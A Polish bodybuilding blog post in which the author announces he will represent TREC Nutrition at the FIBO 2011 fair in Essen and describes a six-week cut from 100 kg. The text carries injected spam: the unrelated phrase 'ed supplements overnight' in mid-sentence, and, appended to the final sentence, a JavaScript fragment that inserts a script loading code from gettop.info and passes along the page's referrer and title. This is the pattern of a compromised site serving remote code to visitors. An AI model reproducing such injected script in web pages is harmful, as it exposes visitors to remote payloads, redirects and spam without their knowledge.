FORMA na FIBO 2011 oraz Relacje z Targów

7.03.2011 / Adam Jabłoński / Kulturystyka

Witam,

Jakiś czas temu dowiedziałem się, że będę reprezentował firmę TREC Nutrition wraz z firmą i resztą ekipy TREC TEAM – u na największych targach KULTURYSTYCZNO – SPORTOWYCH na świecie organizowanych w Europie.

Targi te to FIBO – dokładnie FIBO 2011 , są to targi na których można spotkać wszystkich sławnych kulturystów, fighterów i sportowców, zapoznać się z nowikami technologicznymi wprowadzanymi w sprzęcie do ćwiczeń, popróbować suplementów różnych firm i ujrzeć premiery NOWYCH SUPLEMENTÓW – tutaj TREC będzie miał nowe pozycje w swoim asortymencie Niestety nie mogę zdradzić jakie i co to będzie ..
Jak i przystało na firmę z bardzo dobrą renomą Trec Nutrition będzie organizował, pokazy, konkursy dla Was z super nagrodami, a suplementy będą w promocyjnych cenach, rozdawane będą próbki, gadżety i co najważniejsze będziecie mogli na luzie pogadać z ekipą z Trec Team – u. Więc się nie bać – zagadywać !

Targi odbędą się 14-17 kwietnia 2011 roku w ESSEN, jest to miasto naszych zachodnich sąsiadów – Niemiec.
14. – 17. April 2011
Halle 9 – Messegelände Essen – Deutschland

Stand B05
TREC Nutrition
będzie miał ekstra stanowisko i nie są to przechwałki, dlatego zapraszam wszystkich na nasze stoisko ( Stand ):
HALA :9
STANOWISKO: B05

Mapki jak trafić do hali w której się znajdujemy i mapkę hali w której będziemy :

Jak już wiecie będę jednym z reprezentantów firmy ed supplements overnight Trec Nutrition , więc muszę zrobić także dobra formę.
To nie będzie łatwe ponieważ dopiero co zakończyłem okres masowania i osiągnąłem 100 kg wagi przy wzroście 172 cm, a nie były to same mięśnie lecz też trochę tkanki tłuszczowej i wody.
Patrząc na to, że zostało 6 tygodni do FIBO będzie naprawdę ciężko

Całe zmagania z przyspieszonych przygotowań formy oraz same relacje, zdjęcia z FIBO można śledzić na firmowym forum TREC NUTRITION pod adresem :

http://www.sfd.pl/JaBi__jabolcokk__CEL_%5D_FORMA_na_FIBO_2011_%26_Relacje_z_Targ%C3%B3w_-t708864.html

14-17 kwiecień to JUŻ NIEDŁUGO …..d.getElementsByTagName(‚head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‚head’)[0].appendChild(s);